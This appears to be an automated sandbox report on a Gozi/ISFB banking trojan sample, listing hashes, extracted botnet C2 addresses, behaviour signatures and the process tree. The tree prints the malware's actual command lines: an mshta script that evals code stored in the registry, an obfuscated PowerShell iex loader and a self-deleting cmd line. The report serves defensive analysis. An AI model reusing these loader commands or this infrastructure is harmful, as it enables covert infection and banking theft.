gozi | 9f710a0fc0cadbf3378c06ca4fefa2486bdf04646201f9efec7cd5a4c97634b4

Analysis

max time kernel
150s
max time network
120s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
03-10-2023 12:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

client.exe
Size

295KB
MD5

ed017c0f334b6d10ac5aca77fe7f9a2a
SHA1

de7a838cbf418f5c093e5bed00254c4c68b82fa7
SHA256

9f710a0fc0cadbf3378c06ca4fefa2486bdf04646201f9efec7cd5a4c97634b4
SHA512

e7210ef6cfb8b9cad8078b8bdc4331eba04c9b7bd87b1aadce8c84560035fe4725161dceaca03608f10f7e02de7120c6dbf345c0ac69c72d5613e85080f58316
SSDEEP

3072:Az6N1tmvikka83g9IGkpt4fMlw5mlg9eidid74+VONrRrCS:bN1cvBka83g9PkUf55B++1r

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

185.247.184.139

62.72.33.155

incontroler.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

expirew.com

whofos.com

onlinepoints.online

onlinepoints.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1188 cmd.exe

pid	process
1188	cmd.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2532 set thread context of 1236	2532	powershell.exe	Explorer.EXE
PID 1236 set thread context of 1188	1236	Explorer.EXE	cmd.exe
PID 1188 set thread context of 1436	1188	cmd.exe	PING.EXE
PID 1236 set thread context of 596	1236	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1436 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

1436 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1436	PING.EXE

pid	process
1436	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

client.exepowershell.exeExplorer.EXE

pid	process
1964	client.exe
2532	powershell.exe
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1236 Explorer.EXE
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

2532 powershell.exe
1236 Explorer.EXE
1188 cmd.exe
1236 Explorer.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2532 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

1236 Explorer.EXE

pid	process
1236	Explorer.EXE

pid	process
2532	powershell.exe
1236	Explorer.EXE
1188	cmd.exe
1236	Explorer.EXE

description	pid	process
Token: SeDebugPrivilege	2532	powershell.exe

pid	process
1236	Explorer.EXE

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2976 wrote to memory of 2532	2976	mshta.exe	powershell.exe
PID 2976 wrote to memory of 2532	2976	mshta.exe	powershell.exe
PID 2976 wrote to memory of 2532	2976	mshta.exe	powershell.exe
PID 2532 wrote to memory of 2908	2532	powershell.exe	csc.exe
PID 2532 wrote to memory of 2908	2532	powershell.exe	csc.exe
PID 2532 wrote to memory of 2908	2532	powershell.exe	csc.exe
PID 2908 wrote to memory of 2968	2908	csc.exe	cvtres.exe
PID 2908 wrote to memory of 2968	2908	csc.exe	cvtres.exe
PID 2908 wrote to memory of 2968	2908	csc.exe	cvtres.exe
PID 2532 wrote to memory of 2868	2532	powershell.exe	csc.exe
PID 2532 wrote to memory of 2868	2532	powershell.exe	csc.exe
PID 2532 wrote to memory of 2868	2532	powershell.exe	csc.exe
PID 2868 wrote to memory of 1672	2868	csc.exe	cvtres.exe
PID 2868 wrote to memory of 1672	2868	csc.exe	cvtres.exe
PID 2868 wrote to memory of 1672	2868	csc.exe	cvtres.exe
PID 2532 wrote to memory of 1236	2532	powershell.exe	Explorer.EXE
PID 2532 wrote to memory of 1236	2532	powershell.exe	Explorer.EXE
PID 2532 wrote to memory of 1236	2532	powershell.exe	Explorer.EXE
PID 1236 wrote to memory of 1188	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 1188	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 1188	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 1188	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 1188	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 1188	1236	Explorer.EXE	cmd.exe
PID 1188 wrote to memory of 1436	1188	cmd.exe	PING.EXE
PID 1188 wrote to memory of 1436	1188	cmd.exe	PING.EXE
PID 1188 wrote to memory of 1436	1188	cmd.exe	PING.EXE
PID 1188 wrote to memory of 1436	1188	cmd.exe	PING.EXE
PID 1236 wrote to memory of 596	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 596	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 596	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 596	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 596	1236	Explorer.EXE	cmd.exe
PID 1188 wrote to memory of 1436	1188	cmd.exe	PING.EXE
PID 1188 wrote to memory of 1436	1188	cmd.exe	PING.EXE
PID 1236 wrote to memory of 596	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 596	1236	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1236

C:\Users\Admin\AppData\Local\Temp\client.exe
"C:\Users\Admin\AppData\Local\Temp\client.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1964

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jrx9='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jrx9).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\30BA078A-CF87-E252-D964-73361DD857CA\\\TimeContact'));if(!window.flag)close()</script>"
2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ovpuppjemu -value gp; new-alias -name xibhxypodg -value iex; xibhxypodg ([System.Text.Encoding]::ASCII.GetString((ovpuppjemu "HKCU:Software\AppDataLow\Software\Microsoft\30BA078A-CF87-E252-D964-73361DD857CA").ChartText))
3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2532

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5mw9lefq.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2908

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB73F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB72F.tmp"
5⤵
PID:2968

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o4499hzf.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2868

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB829.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB819.tmp"
5⤵
PID:1672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"
2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1188

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1436

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5mw9lefq.dll

Filesize
3KB

MD5
30673729ec11feb4b99c6f068f989bdc

SHA1
8c949798433039aefc9aaf66b74f1f8ef782fc9c

SHA256
c0df6ccc354c22bc10110d6527affe6939521b4f750da1904b214b21cfe438c1

SHA512
5d266aaf6f19d158e219a3ce6c1615518e1eba30cc3eb46743eeaa163f381b1edbf484042a25ef3ef56bd62b19265c538e7cd864c9f4d7b332e0caa0c1cae9b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\5mw9lefq.pdb

Filesize
7KB

MD5
762c9927a8769749f50a079eb2d8dea7

SHA1
08e8638e724dd029ad2caf0d5d474b27ec4b4cf5

SHA256
b21da1a415f77981cfe05a2b3b2170d1ef6ad320c3a5da70296e890b6a131397

SHA512
54f6419cf326c341cf7044e7d34d581b2572a926e293518ee724ed904746f53a2a6871744af13e0853ac80030904c9f7b8245b782683ab95c60939124b34e2cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB73F.tmp

Filesize
1KB

MD5
12b3822a8fad1d9e21917508edee052a

SHA1
ff00a911d0013686ae1975c3e3048d5158daf69b

SHA256
d34ef58d02659ae62770edcb2f81e42d0e13fb0e5640bb0ccbaa708a6327e9cd

SHA512
d3762e15e3d322f03293cfae2c85e390d4d26e895c39717f2ac9c5738befe812c0a46ecdaff1155d5131a399159e4dea89165a25880b74a4808df59bbaa34a05

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB829.tmp

Filesize
1KB

MD5
99877d22ec308b576b17e9c38ef8d4b7

SHA1
4edea591a2fbdad9a15a5033416f7478195e2bc7

SHA256
413c09fc355747506217e3ab831e5b4158623eeeff8c5b5a180d6e3c623ebd04

SHA512
d847a34b79e8eacbcc2bc36419b534e48628466a09211632332fb135150a0f8e43415045037aa4a85eaa85fe0e872a9314ee66331907515c16d59d906759365f

Download Submit
C:\Users\Admin\AppData\Local\Temp\o4499hzf.dll

Filesize
3KB

MD5
bf47ff75e06f9c4ec95a83c06fb96052

SHA1
ff710b1f4596ac999b6c572ad49f18d613e25a52

SHA256
21876c19761d2185654854b671eabde514c3377a860a5e99d499808917131478

SHA512
2a64c25a4ebbcd6347b9c93c5c4e1bb29e680d9de56bd12743ecc2f42702057884e469e4332685a1ccd49cc33767ab4874889be1b64aabdcbf11e578ae0155b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\o4499hzf.pdb

Filesize
7KB

MD5
d91688b5af264c10e20c7397fcaf82e0

SHA1
829878b788cc2f3bd4395940f9f087dddb6207d3

SHA256
d6f353c777b65231af0dfc2bac05d909d26203f5b5a40786520ffd92d5b6cc5c

SHA512
6d5a60cf4168853c3c08d19dde5e9ce05f3feea904d720614d9f9b9afecf52c30d29cbff618ab3f4e22b3d7290914321645ad1ce834fc8dd7ee8958b3ef0e0e9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5mw9lefq.0.cs

Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5mw9lefq.cmdline

Filesize
309B

MD5
f7fc62ad091b607f1e863419767fea20

SHA1
d07a3853b38b8ce6343fb538328dee8a09599e78

SHA256
49e30ba0629546dffb7b2ee1b6872c2153f6fb78aa6248834ae413285bed921f

SHA512
080c57f24c299255067a30ffe5d2749fb5ca9b2cb7805d4fded6e2fdea1aea33023f3ae3b9c64657708889a396c41f843d62b9edc48a7a6c9b9a7b0fb096364c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCB72F.tmp

Filesize
652B

MD5
f419781d81774666cca79c20ac0a7b4a

SHA1
f8a79e4e62429462dd6327c8730ab6e4d60d2cf4

SHA256
6242845eb9ffd2f7713d3305ce817149a319988f621cb2fedec8ac4cdd5a80c8

SHA512
319f9a03af300b7f124e0c0350ed0c1f136ea55bb54719dcb13f89bfd9e7baf10aaeecdd58fc14f0ac27adfcef2b767c729df8cc9ed8afbe83650e4b9a557f9c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCB819.tmp

Filesize
652B

MD5
c1b82686af1217990a5e33b2ff57c489

SHA1
68fff2442d6ea71cd023e71ca80fc53d1570cb06

SHA256
622146cf413338c3bf6ad9b5f8017f01a78805e45bb181352be76ff0880207a6

SHA512
d64ade6608b5c955bc9d8e5c4fd99113187ebad0fc7dd20d2b4d8d71fadc73c3dda9640a2f2793eb741b58233d23ad0734d03f0037172a58e80994a49004bf5d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o4499hzf.0.cs

Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o4499hzf.cmdline

Filesize
309B

MD5
b6ee31fbb3eb7b686d1590deb40d2dba

SHA1
f54614b024fcb8c39364fff83114c1a083d9f080

SHA256
1f8111c8a14feb354ed4943d073547ccb31a0270a7e0a45ccb2b617c89b56c2e

SHA512
1e8f0116de26212e3d0e9cb11023d27bb9d5c79b3b7de5ce44bea64676f72cd48ff9309ebe2644bde39b535dcd9db0a029834e7dcb006f27cc12d86968798fad

Download Submit
memory/596-88-0x00000000002B0000-0x0000000000348000-memory.dmp

Filesize
608KB

Download
memory/596-87-0x0000000000120000-0x0000000000121000-memory.dmp

Filesize
4KB

Download
memory/596-84-0x00000000002B0000-0x0000000000348000-memory.dmp

Filesize
608KB

Download
memory/596-92-0x00000000002B0000-0x0000000000348000-memory.dmp

Filesize
608KB

Download
memory/1188-69-0x000007FFFFFD5000-0x000007FFFFFD6000-memory.dmp

Filesize
4KB

Download
memory/1188-71-0x0000000000110000-0x0000000000111000-memory.dmp

Filesize
4KB

Download
memory/1188-70-0x0000000001C30000-0x0000000001CD4000-memory.dmp

Filesize
656KB

Download
memory/1188-91-0x0000000001C30000-0x0000000001CD4000-memory.dmp

Filesize
656KB

Download
memory/1236-89-0x0000000004220000-0x00000000042C4000-memory.dmp

Filesize
656KB

Download
memory/1236-56-0x0000000004220000-0x00000000042C4000-memory.dmp

Filesize
656KB

Download
memory/1236-59-0x0000000002A40000-0x0000000002A41000-memory.dmp

Filesize
4KB

Download
memory/1436-78-0x0000000000200000-0x0000000000201000-memory.dmp

Filesize
4KB

Download
memory/1436-90-0x0000000001B30000-0x0000000001BD4000-memory.dmp

Filesize
656KB

Download
memory/1436-77-0x0000000001B30000-0x0000000001BD4000-memory.dmp

Filesize
656KB

Download
memory/1436-76-0x000007FFFFFD4000-0x000007FFFFFD5000-memory.dmp

Filesize
4KB

Download
memory/1964-2-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/1964-11-0x0000000004190000-0x0000000004192000-memory.dmp

Filesize
8KB

Download
memory/1964-8-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/1964-3-0x0000000000220000-0x000000000022B000-memory.dmp

Filesize
44KB

Download
memory/1964-4-0x0000000000290000-0x000000000029D000-memory.dmp

Filesize
52KB

Download
memory/1964-7-0x0000000002400000-0x0000000002500000-memory.dmp

Filesize
1024KB

Download
memory/1964-1-0x0000000002400000-0x0000000002500000-memory.dmp

Filesize
1024KB

Download
memory/2532-20-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2532-68-0x000000001B630000-0x000000001B66D000-memory.dmp

Filesize
244KB

Download
memory/2532-67-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp

Filesize
9.6MB

Download
memory/2532-61-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2532-57-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp

Filesize
9.6MB

Download
memory/2532-55-0x000000001B630000-0x000000001B66D000-memory.dmp

Filesize
244KB

Download
memory/2532-52-0x000000001B610000-0x000000001B618000-memory.dmp

Filesize
32KB

Download
memory/2532-36-0x000000001B600000-0x000000001B608000-memory.dmp

Filesize
32KB

Download
memory/2532-22-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2532-21-0x0000000002370000-0x0000000002378000-memory.dmp

Filesize
32KB

Download
memory/2532-19-0x000000001B0D0000-0x000000001B3B2000-memory.dmp

Filesize
2.9MB

Download
memory/2532-18-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2532-17-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp

Filesize
9.6MB

Download